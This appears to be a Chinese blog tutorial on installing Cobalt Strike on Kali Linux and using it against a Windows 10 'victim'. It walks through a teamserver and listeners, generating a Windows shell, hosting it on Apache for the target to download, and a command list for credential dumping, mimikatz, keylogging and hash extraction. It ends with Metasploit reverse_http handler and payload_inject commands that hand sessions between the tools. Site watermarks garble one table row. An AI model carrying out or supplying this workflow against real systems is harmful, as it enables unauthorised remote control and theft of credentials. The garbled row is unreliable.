Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界大佬称为CS。本文将会讲述如何在kali Linux安装Cobalt Strike以及使用这款神器。希望给各位一点帮助。
环境介绍
- kali linux 2021
- Cobalt Strike4.3
- windows10(受害机)
在kali中安装Cobalt Strike
在kali中安装很简单,Cobalt Strike是基于Java的。因为kali中已经安装了Java环境,所以我们直接可以运行Cobalt Strike。
进入Cobalt Strike目录,执行./start.sh即可运行Cobalt Strike。
这样便启动了Cobalt Strike
如上会提示登录
这时我们需要启动登录服务,因为Cobalt Strike 是可以团队操作。也就是所我们需要启动团队服务器。执行下面命令:
./teamserver 192.168.123.33 pass66
#./teamserver kali的ip 登录密码
生成shell
首先配置监听
和msfconsole类似,Cobalt Strike也要配置监听。Cobalt Strike——Listeners——Add
相关参数说明:
| 参数 | 说明 |
|---|---|
| name | 监听任务的名称 可随意 |
| payload | 监听的方式 支持http https TCP 等 |
| HTTPS HOSTS | 主机IP地址 |
| Host Rotation Strategy | 主机转移策略 一般默认即可 |
生成shellAttacks—Packages——windows ececutable

配置windows平台下的shell
保存生成的shell
| 参数 | 说明 |
|---|---|
| HTML Application | 基于http方式的攻击,如受害者打开网站即可获得shell |
| MS Office Macro | office宏攻击,如打开word文档即可获得shell |
| Payload Generator | 其他方式的payload,如C python vb |
| windows ececutable | 生成windows平台下的shell |
Shell上线
将生成的shell放到/var/www/html,并启动apache服务器
cp kali.exe /var/www/html
service apache2 start当目标主机下载并运行shell后,我们便可以看到回弹。
对目标主机的操作

interact 命令模式
当我们点击interact后,便会和msfconsole一样,进入命令模式。
现列出常用的命名
| 参数 | 说明 |
|---|---|
| argue | 匹配进程的欺骗参数 |
| blockdlls | 阻止子进程中的非Microsoft DLL |
| browserpivot | 设置浏览器会话 |
| cancel | 取消正在进行的下载 |
| cd | 改变目录位置 |
| checkin | 呼叫总部并发布数据 |
| chromedump | 从Google Chrome恢复凭据 |
| clear | 清除信标队列 |
| connect | 通过TCP连接到目标 |
| covertvpn | 部署隐蔽VPN客户端 |
| cp | 复制文件 |
| dcsync | 从DC提取密码哈希 |
| desktop | 查看目标桌面并与之交互 |
| dllinject | bbskali.cn |
| dllload | 将反射DLL注入进程 |
| download | 文件下载 |
| downloads | 列出正在下载的文件 |
| drives | 列出目标上的驱动器 |
| elevate | 在提升的上下文中生成会话 |
| exit | 关闭当前连接 |
| getprivs | 对当前令牌启用系统权限 |
| getsystem | 提升系统权限 |
| getuid | 获取用户ID |
| hashdump | 导出hash密码 |
| keylogger | 记录键盘 |
| kill | Kill 掉进程 |
| logonpasswords | 使用mimikatz转储凭据和哈希 |
| ls | 列出文件列表 bbskali.cn |
| make_token | 创建一个 token |
| mimikatz | 运行神器 mimikatz |
| mkdir | 创建一个目录 |
| mv | 移动文件 |
| net | 网络和主机枚举 |
| upload | 上传文件 |
如获取C盘文件信息
cd /
ls
和目标屏幕交互
desktop
其他菜单操作
由于比较多,就不一个个说了。把常用的几个菜单说说。
可视化的文件浏览
Explore-File Browser
对局域网内所有设备扫描
显示目标的所有进程
Cobalt Strike与Msfconsole联动
首先我们在Cobalt Strike中创建一个新的Foreign Http监听
然后在msfconsole中配置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 192.168.123.33
set LPORT 4444
exploit返回Cobalt Strike,选择目标,右键Spawn选择我们前面配置的Foreign Http监听
这时,我们返回到msf中便可以看到成功得到回弹。
将msf会话转移到Cobalt Strike
一样,我们先建立一个http的监听
因为在msf中我们已经获得了session
在其配置如下:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set LHOST 192.168.123.33
set LPORT 5555
set SESSION 1
run
set DisablePayloadHandler true 作用是msf不监听,代表是用来返给其他监听的 。
然后我们返回到Cobalt Strike这时便可以看到会话了
其他文章推荐
《Cobalt Strike 目标上线微信提示》
《Cobalt Strike入坑指南(利用office文件获取shell)》
未完待续……
1 条评论